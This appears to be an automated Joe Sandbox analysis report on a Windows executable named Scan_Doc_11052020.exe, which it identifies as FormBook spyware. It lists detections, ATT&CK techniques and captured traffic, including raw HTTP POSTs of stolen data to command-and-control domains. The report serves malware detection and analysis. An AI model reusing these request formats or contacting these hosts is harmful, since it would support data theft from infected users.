Loading ...

Play interactive tourEdit tour

Analysis Report Scan_Doc_11052020.exe

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:229288
Start date:12.05.2020
Start time:03:19:02
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 12m 36s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:Scan_Doc_11052020.exe
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of analysed new started processes analysed:16
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:2
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.troj.spyw.evad.winEXE@15/10@4/3
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 14.8% (good quality ratio 13.4%)
  • Quality average: 70.5%
  • Quality standard deviation: 30.7%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 114
  • Number of non-executed functions: 307
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .exe
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, WMIADAP.exe, svchost.exe
  • Excluded IPs from analysis (whitelisted): 2.18.68.82, 205.185.216.42, 205.185.216.10, 104.18.134.62, 104.18.132.62, 104.18.133.62, 104.18.135.62, 104.18.136.62
  • Excluded domains from analysis (whitelisted): fs.microsoft.com, format.com.cdn.cloudflare.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net
  • Report creation exceeded maximum time and may have missing disassembly code information.
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold1000 - 100false
FormBook
malicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification Spiderchart

Analysis Advice

Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely more UI automation may extend behavior
Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal more behavior
Some HTTP requests failed (404). It is likely the sample will exhibit less behavior



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsExecution through Module Load1Registry Run Keys / Startup Folder1Process Injection512Software Packing1Credential Dumping1Security Software Discovery231Remote File Copy3Man in the Browser1Data Encrypted1Remote File Copy3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Replication Through Removable MediaExploitation for Client Execution1Port MonitorsAccessibility FeaturesDisabling Security Tools1Network SniffingFile and Directory Discovery2Remote ServicesData from Local System1Exfiltration Over Other Network MediumStandard Cryptographic Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesWindows Management InstrumentationAccessibility FeaturesPath InterceptionDeobfuscate/Decode Files or Information1Input CaptureSystem Information Discovery112Windows Remote ManagementEmail Collection1Automated ExfiltrationStandard Non-Application Layer Protocol4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseScheduled TaskSystem FirmwareDLL Search Order HijackingObfuscated Files or Information2Credentials in FilesVirtualization/Sandbox Evasion3Logon ScriptsInput CaptureData EncryptedStandard Application Layer Protocol14SIM Card SwapPremium SMS Toll Fraud
Exploit Public-Facing ApplicationCommand-Line InterfaceShortcut ModificationFile System Permissions WeaknessMasquerading1Account ManipulationProcess Discovery2Shared WebrootData StagedScheduled TransferStandard Cryptographic ProtocolManipulate Device CommunicationManipulate App Store Rankings or Ratings
Spearphishing LinkGraphical User InterfaceModify Existing ServiceNew ServiceVirtualization/Sandbox Evasion3Brute ForceRemote System Discovery1Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used PortJamming or Denial of ServiceAbuse Accessibility Features
Spearphishing AttachmentScriptingPath InterceptionScheduled TaskProcess Injection512Two-Factor Authentication InterceptionNetwork SniffingPass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Spearphishing via ServiceThird-party SoftwareLogon ScriptsProcess InjectionDLL Side-Loading1Bash HistoryNetwork Service ScanningRemote Desktop ProtocolClipboard DataExfiltration Over Alternative ProtocolStandard Application Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus detection for URL or domainShow sources
Source: http://www.brandbank.news/mq3/Avira URL Cloud: Label: malware
Source: http://www.brandbank.news/mq3/www.shimi783.infoAvira URL Cloud: Label: malware
Source: http://www.brandbank.newsAvira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URLShow sources
Source: http://www.porcber.comVirustotal: Detection: 6%Perma Link
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Temp\Zhrptqdzh\vrhdctut50jxtp.exeVirustotal: Detection: 19%Perma Link
Source: C:\Users\user\AppData\Local\Temp\Zhrptqdzh\vrhdctut50jxtp.exeReversingLabs: Detection: 35%
Multi AV Scanner detection for submitted fileShow sources
Source: Scan_Doc_11052020.exeVirustotal: Detection: 19%Perma Link
Source: Scan_Doc_11052020.exeReversingLabs: Detection: 35%
Yara detected FormBookShow sources
Source: Yara matchFile source: 0000000F.00000002.1123596075.00000000050C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000002.1194591234.0000000000B20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000002.1122903967.0000000004EB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.857272679.0000000005510000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000E.00000002.1123325288.0000000005310000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000002.1120293845.00000000037A5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.859171433.0000000005650000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000E.00000002.1123113610.00000000051E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000002.1122759975.0000000004D70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.860529111.0000000005680000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000E.00000002.1120571214.0000000003C25000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000002.1194734032.0000000000B90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000002.1194902186.0000000000BD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000011.00000002.1115593061.0000000000F00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000E.00000002.1123910075.0000000005600000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.850402740.0000000003EE5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 15.2.vrhdctut50jxtp.exe.4d70000.3.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 14.2.vrhdctut50jxtp.exe.51e0000.3.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 15.2.vrhdctut50jxtp.exe.4d70000.3.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 0.2.Scan_Doc_11052020.exe.5510000.3.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 0.2.Scan_Doc_11052020.exe.5510000.3.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 14.2.vrhdctut50jxtp.exe.51e0000.3.raw.unpack, type: UNPACKEDPE
Antivirus or Machine Learning detection for unpacked fileShow sources
Source: 15.2.vrhdctut50jxtp.exe.4d70000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
Source: 14.2.vrhdctut50jxtp.exe.51e0000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.Scan_Doc_11052020.exe.5510000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen

Networking:

barindex
HTTP GET or POST without a user agentShow sources
Source: global trafficHTTP traffic detected: GET /mq3/?fDK=BhjLRlh&SXGT2PEh=Rok90QOK6ea72UleUAJ4ErWaSqt/IQVB8JdCNgRpDbdf1LJgzNf1D86eRIdXJU+axZ+t HTTP/1.1Host: www.bzasd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /mq3/?SXGT2PEh=r8Q75MIXz7zy5sB899Th1/k9+Lnr+VmPBQzoNFk56PWTbuYDB27UYmJg83KfwIIDO73Z&fDK=BhjLRlh HTTP/1.1Host: www.dllearn.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /mq3/?fDK=BhjLRlh&SXGT2PEh=Ucg4IdL9jFr4XeSjaPMyHB4uwBktJa1xNFlwHiqXLBzLuD0Ne+QKmAu6UBl6f+0aCpLv HTTP/1.1Host: www.axcyl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malwareShow sources
Source: Joe Sandbox ViewIP Address: 50.63.202.49 50.63.202.49
Source: Joe Sandbox ViewIP Address: 50.63.202.49 50.63.202.49
Internet Provider seen in connection with other malwareShow sources
Source: Joe Sandbox ViewASN Name: unknown unknown
Source: Joe Sandbox ViewASN Name: unknown unknown
Uses a known web browser user agent for HTTP communicationShow sources
Source: global trafficHTTP traffic detected: POST /mq3/ HTTP/1.1Host: www.dllearn.comConnection: closeContent-Length: 182834Cache-Control: no-cacheOrigin: http://www.dllearn.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.dllearn.com/mq3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 53 58 47 54 32 50 45 68 3d 6a 65 63 42 6e 6f 6f 58 70 72 33 38 72 4c 74 6e 79 39 43 31 6c 5f 59 5a 30 2d 7e 32 37 6b 6d 6b 59 47 36 57 5a 58 73 4e 72 39 72 53 4c 50 35 53 50 6b 7e 4f 51 42 49 63 73 58 69 45 33 4b 77 79 50 59 50 64 33 2d 42 71 46 7a 70 63 41 32 31 43 5a 47 73 4e 57 47 77 56 70 71 5a 36 28 78 28 73 4d 6d 4b 33 4e 71 71 6e 6d 5a 39 77 6f 71 70 56 44 47 71 4d 61 6c 4c 61 49 74 59 43 5a 39 71 6f 4f 57 42 33 59 38 73 52 6b 65 68 6b 55 50 33 38 39 4c 43 46 57 45 77 48 76 52 42 49 30 61 78 61 45 76 4e 56 50 4f 4d 48 42 48 4d 6e 46 72 47 6b 70 33 4b 46 4a 43 53 4a 54 4a 51 6b 41 79 70 4b 30 35 4d 48 78 32 56 74 39 70 33 6e 52 65 70 71 61 42 76 77 7e 6d 79 69 52 50 78 34 74 42 6f 58 67 57 7a 5a 31 32 45 59 50 39 61 35 6b 79 41 54 6e 45 70 68 56 66 51 31 37 69 30 76 4c 70 4d 67 59 33 67 4f 6e 48 70 34 73 54 39 6b 51 33 74 52 43 41 6b 64 78 70 67 6e 49 72 32 62 33 7a 54 71 52 6c 63 68 53 5f 31 37 73 39 45 4c 35 58 7e 61 48 6e 61 68 41 6d 54 55 64 51 4d 43 41 6a 41 6a 4b 48 34 75 35 63 54 54 72 47 4d 61 69 62 55 68 6a 6b 6b 45 30 52 6c 70 61 5f 46 5f 44 69 42 37 73 45 67 50 4c 30 43 5f 7e 67 55 6e 52 66 4c 45 31 69 79 4b 44 74 64 59 6d 47 71 59 6d 75 31 35 35 32 79 78 73 5f 71 2d 45 6f 6b 78 63 61 32 76 4d 56 74 4d 41 45 73 74 6c 31 58 75 62 50 7e 31 35 4c 61 6d 53 2d 79 4b 52 35 33 65 73 59 48 51 58 35 74 52 5a 75 45 48 30 59 66 49 4d 70 37 79 79 6d 77 69 44 32 77 52 59 6b 43 57 63 76 6b 48 50 78 66 54 48 77 79 44 41 64 6e 50 43 70 6f 36 7e 47 72 58 59 52 66 31 6f 61 39 43 36 69 36 50 39 63 4e 36 4a 48 6c 42 31 66 55 35 4b 69 31 32 78 7a 33 75 72 6f 6a 77 7a 67 59 35 4b 32 6c 54 67 56 4c 36 53 70 73 79 67 5a 4b 50 66 74 65 42 43 45 43 6a 67 38 36 74 4e 68 35 51 6c 5a 6b 38 28 68 74 4c 67 50 6e 63 53 2d 64 4a 39 2d 63 7a 6c 70 39 78 57 32 67 64 58 38 78 47 4f 6c 73 4b 67 4a 78 32 28 73 62 6b 67 6a 4b 36 4d 61 4a 30 51 41 69 6b 37 62 77 53 64 78 7a 66 72 51 54 62 4e 34 78 4e 6b 30 51 56 5a 5a 67 36 34 69 70 45 49 31 59 43 73 45 69 38 68 46 6c 75 6e 70 66 5f 48 64 6a 48 4b 6d 6b 45 38 41 61 5f 53 5f 62 67 4d 5f 6c 75 4b 56 4c 4e 78 6d 66 77 74 70 6f 30 4a 6a 38 6a 54 57 32 5a 43 34 56 74 76 61 4d 4a 67 41 69 67 56 67 49 33 6d 2d 6a 5f 70 6e 44 53 62 44 4d 7a 41 6b 46 53 70 35 56 6a 46 42 45 43 48 48 37 48 7a 51 55 78 5a 33 37 44 43 7a 46 65 58 76 4f 56 71 7a 58 4a 6f 79 66 50 4f 6e 6c 73 68 62 55 61 78 58 7e 73 64 4c 54 6d 73 48 66 31 63 37 36 37 5a 75 46 61 67 59 58 57 6b 6a 6a 76 66 56 57 73 45 39 35 74 79 58 48 67 7e 74 74 46 6d 70 52 53 53 6b 38 4f 48 4d 66 72 63 41 69 73 6c 57 33 6f 54 72 31 52 74 7a 33 68 76 6a 6d 4f 33 5f 28 32 47 72 28 79 69 7a 5
Source: global trafficHTTP traffic detected: POST /mq3/ HTTP/1.1Host: www.axcyl.comConnection: closeContent-Length: 182834Cache-Control: no-cacheOrigin: http://www.axcyl.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.axcyl.com/mq3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 53 58 47 54 32 50 45 68 3d 63 2d 73 43 57 37 32 6d 30 7a 79 4b 55 34 28 5a 52 49 5a 75 45 58 77 63 7e 68 30 6f 44 76 4a 48 4a 68 73 53 43 78 71 74 61 43 6e 34 28 54 67 6e 54 74 5a 47 6f 6d 33 70 51 6e 34 47 59 65 70 32 64 73 79 41 4f 41 28 69 59 45 4a 6c 76 37 56 72 6f 75 4c 42 31 71 6b 4b 30 53 72 43 6e 70 39 52 37 71 4b 34 62 56 76 6e 73 56 68 33 47 51 57 41 38 43 79 66 44 38 73 62 54 37 67 33 72 64 51 45 6c 52 6b 34 54 58 45 6a 4f 35 62 48 43 46 6f 54 69 52 41 6d 65 2d 30 63 45 78 36 75 7e 56 4f 4a 39 78 34 4d 52 6b 36 35 75 57 4a 45 74 58 50 53 6a 75 59 6e 28 75 51 59 4e 61 69 6a 4c 79 58 4a 79 64 41 30 63 52 52 49 33 76 58 45 44 52 5a 70 68 71 5a 78 4b 54 70 37 56 7a 67 58 73 6d 6c 4e 28 35 48 36 5a 39 37 47 64 5a 6b 6a 32 64 43 56 7a 65 66 44 39 33 48 71 72 35 70 56 4f 7a 57 42 53 32 53 34 79 4b 70 75 34 66 6d 49 28 30 56 63 55 6b 67 61 7a 54 35 4f 54 75 73 54 51 71 7e 6d 74 2d 5a 4b 4d 4f 4f 49 42 48 63 35 6b 45 69 33 68 59 56 54 4b 33 63 4f 39 59 64 34 48 62 34 6a 4f 79 4c 32 59 6a 41 7a 59 63 4e 50 32 50 7e 45 4d 66 38 77 50 58 7e 57 72 35 4e 6c 45 67 5a 36 4e 43 49 72 77 4e 74 50 64 4e 4c 56 66 76 7e 72 30 6d 56 4a 4f 42 69 71 56 68 72 6d 4e 64 5a 4d 38 2d 67 6c 74 6d 49 6c 32 4a 46 79 43 47 70 52 58 37 6b 6d 71 33 37 52 72 32 71 46 35 32 6c 4e 71 4d 56 36 76 79 66 46 61 35 6a 4d 42 48 61 7a 56 7a 34 34 44 30 53 75 79 37 61 69 51 67 44 53 4d 45 44 61 55 33 75 43 62 75 54 73 66 35 76 78 73 44 46 4f 6f 50 75 6b 4c 46 42 6e 43 6d 51 69 50 74 37 53 74 75 33 6e 33 30 4d 74 59 42 76 41 45 32 56 52 43 57 73 44 6d 30 73 42 57 75 4d 36 48 51 30 6a 44 77 74 51 58 30 57 4c 53 33 4a 7a 6b 31 4e 53 75 59 4f 6c 53 61 45 6e 75 77 6d 79 39 75 72 72 57 5a 32 4c 46 5a 77 6c 38 5a 54 73 71 55 53 37 45 37 4a 5f 53 54 52 6f 52 4c 56 48 38 68 69 56 57 6a 61 42 57 4c 6a 59 36 64 4b 6e 45 44 30 6e 30 6f 4c 5f 28 2d 58 55 63 53 34 46 52 75 38 34 4f 32 61 31 33 68 55 61 74 70 46 58 30 66 54 57 59 4a 78 5a 51 64 39 64 41 6d 32 6d 76 4c 4c 4a 63 44 69 77 76 57 65 4f 66 53 34 6c 78 34 46 67 7e 4d 42 46 28 66 66 4c 66 59 57 6e 54 67 66 69 37 79 77 58 63 33 78 4e 4b 59 48 42 37 51 52 73 33 6d 33 4f 62 5f 54 7a 42 66 73 36 50 38 35 64 49 4e 69 78 6d 42 61 56 6f 78 59 33 57 67 53 57 45 48 33 31 55 61 41 70 67 2d 7a 37 6b 2d 52 4c 6d 7a 7a 61 4a 34 72 45 69 2d 56 4b 75 5f 53 56 39 6f 61 30 66 51 38 46 36 7a 7a 6e 36 43 64 4e 58 71 42 58 35 6f 62 73 61 41 6e 4a 49 41 64 4d 4f 57 53 59 61 43 6a 68 62 31 41 58 6f 31 35 41 74 4c 7a 6d 7e 36 54 79 73 79 46 77 54 55 38 4b 7a 30 78 6d 66 38 67 31 51 74 57 6e 51 63 28 42 6e 77 72 6d 59 4a 76 75 4c 4f 77 4d 34 51 6b 62 30 48 6a 33 77 74 5a 6b 4
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /mq3/?fDK=BhjLRlh&SXGT2PEh=Rok90QOK6ea72UleUAJ4ErWaSqt/IQVB8JdCNgRpDbdf1LJgzNf1D86eRIdXJU+axZ+t HTTP/1.1Host: www.bzasd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /mq3/?SXGT2PEh=r8Q75MIXz7zy5sB899Th1/k9+Lnr+VmPBQzoNFk56PWTbuYDB27UYmJg83KfwIIDO73Z&fDK=BhjLRlh HTTP/1.1Host: www.dllearn.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /mq3/?fDK=BhjLRlh&SXGT2PEh=Ucg4IdL9jFr4XeSjaPMyHB4uwBktJa1xNFlwHiqXLBzLuD0Ne+QKmAu6UBl6f+0aCpLv HTTP/1.1Host: www.axcyl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: www.bzasd.com
Posts data to webserverShow sources
Source: unknownHTTP traffic detected: POST /mq3/ HTTP/1.1Host: www.dllearn.comConnection: closeContent-Length: 182834Cache-Control: no-cacheOrigin: http://www.dllearn.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.dllearn.com/mq3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 53 58 47 54 32 50 45 68 3d 6a 65 63 42 6e 6f 6f 58 70 72 33 38 72 4c 74 6e 79 39 43 31 6c 5f 59 5a 30 2d 7e 32 37 6b 6d 6b 59 47 36 57 5a 58 73 4e 72 39 72 53 4c 50 35 53 50 6b 7e 4f 51 42 49 63 73 58 69 45 33 4b 77 79 50 59 50 64 33 2d 42 71 46 7a 70 63 41 32 31 43 5a 47 73 4e 57 47 77 56 70 71 5a 36 28 78 28 73 4d 6d 4b 33 4e 71 71 6e 6d 5a 39 77 6f 71 70 56 44 47 71 4d 61 6c 4c 61 49 74 59 43 5a 39 71 6f 4f 57 42 33 59 38 73 52 6b 65 68 6b 55 50 33 38 39 4c 43 46 57 45 77 48 76 52 42 49 30 61 78 61 45 76 4e 56 50 4f 4d 48 42 48 4d 6e 46 72 47 6b 70 33 4b 46 4a 43 53 4a 54 4a 51 6b 41 79 70 4b 30 35 4d 48 78 32 56 74 39 70 33 6e 52 65 70 71 61 42 76 77 7e 6d 79 69 52 50 78 34 74 42 6f 58 67 57 7a 5a 31 32 45 59 50 39 61 35 6b 79 41 54 6e 45 70 68 56 66 51 31 37 69 30 76 4c 70 4d 67 59 33 67 4f 6e 48 70 34 73 54 39 6b 51 33 74 52 43 41 6b 64 78 70 67 6e 49 72 32 62 33 7a 54 71 52 6c 63 68 53 5f 31 37 73 39 45 4c 35 58 7e 61 48 6e 61 68 41 6d 54 55 64 51 4d 43 41 6a 41 6a 4b 48 34 75 35 63 54 54 72 47 4d 61 69 62 55 68 6a 6b 6b 45 30 52 6c 70 61 5f 46 5f 44 69 42 37 73 45 67 50 4c 30 43 5f 7e 67 55 6e 52 66 4c 45 31 69 79 4b 44 74 64 59 6d 47 71 59 6d 75 31 35 35 32 79 78 73 5f 71 2d 45 6f 6b 78 63 61 32 76 4d 56 74 4d 41 45 73 74 6c 31 58 75 62 50 7e 31 35 4c 61 6d 53 2d 79 4b 52 35 33 65 73 59 48 51 58 35 74 52 5a 75 45 48 30 59 66 49 4d 70 37 79 79 6d 77 69 44 32 77 52 59 6b 43 57 63 76 6b 48 50 78 66 54 48 77 79 44 41 64 6e 50 43 70 6f 36 7e 47 72 58 59 52 66 31 6f 61 39 43 36 69 36 50 39 63 4e 36 4a 48 6c 42 31 66 55 35 4b 69 31 32 78 7a 33 75 72 6f 6a 77 7a 67 59 35 4b 32 6c 54 67 56 4c 36 53 70 73 79 67 5a 4b 50 66 74 65 42 43 45 43 6a 67 38 36 74 4e 68 35 51 6c 5a 6b 38 28 68 74 4c 67 50 6e 63 53 2d 64 4a 39 2d 63 7a 6c 70 39 78 57 32 67 64 58 38 78 47 4f 6c 73 4b 67 4a 78 32 28 73 62 6b 67 6a 4b 36 4d 61 4a 30 51 41 69 6b 37 62 77 53 64 78 7a 66 72 51 54 62 4e 34 78 4e 6b 30 51 56 5a 5a 67 36 34 69 70 45 49 31 59 43 73 45 69 38 68 46 6c 75 6e 70 66 5f 48 64 6a 48 4b 6d 6b 45 38 41 61 5f 53 5f 62 67 4d 5f 6c 75 4b 56 4c 4e 78 6d 66 77 74 70 6f 30 4a 6a 38 6a 54 57 32 5a 43 34 56 74 76 61 4d 4a 67 41 69 67 56 67 49 33 6d 2d 6a 5f 70 6e 44 53 62 44 4d 7a 41 6b 46 53 70 35 56 6a 46 42 45 43 48 48 37 48 7a 51 55 78 5a 33 37 44 43 7a 46 65 58 76 4f 56 71 7a 58 4a 6f 79 66 50 4f 6e 6c 73 68 62 55 61 78 58 7e 73 64 4c 54 6d 73 48 66 31 63 37 36 37 5a 75 46 61 67 59 58 57 6b 6a 6a 76 66 56 57 73 45 39 35 74 79 58 48 67 7e 74 74 46 6d 70 52 53 53 6b 38 4f 48 4d 66 72 63 41 69 73 6c 57 33 6f 54 72 31 52 74 7a 33 68 76 6a 6d 4f 33 5f 28 32 47 72 28 79 69 7a 5
Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)Show sources
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 12 May 2020 01:20:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 35 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6d 69 70 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 69 70 63 61 63 68 65 2e 62 64 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 76 31 2f 6d 69 70 2e 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e e9 a1 b5 e9 9d a2 e4 b8 8d e5 ad 98 e5 9c a8 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 63 61 6e 6f 6e 69 63 61 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 6d 69 70 2d 63 75 73 74 6f 6d 3e 0d 0a 20 20 20 20 20 20 20 20 2e 70 61 67 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 35 76 77 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 70 61 67 65 20 73 70 61 6e 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 76 77 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 34 66 34 66 34 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 70 61 67 65 20 70 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 35 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 61 61 61 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 70 61 67 65 20 2e 65 72 72 6f 72 4d 65 73 73 61 67 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 70 61 67 65 20 61 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 61 61 61 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65
Urls found in memory or binary dataShow sources
Source: explorer.exe, 00000002.00000000.820703019.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000002.00000000.820703019.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000002.00000000.815949561.0000000007B92000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp, systray.exe, 00000004.00000002.1201355608.00000000053E9000.00000004.00000001.sdmpString found in binary or memory: http://www.axcyl.com
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp, systray.exe, 00000004.00000002.1201355608.00000000053E9000.00000004.00000001.sdmpString found in binary or memory: http://www.axcyl.com/mq3/
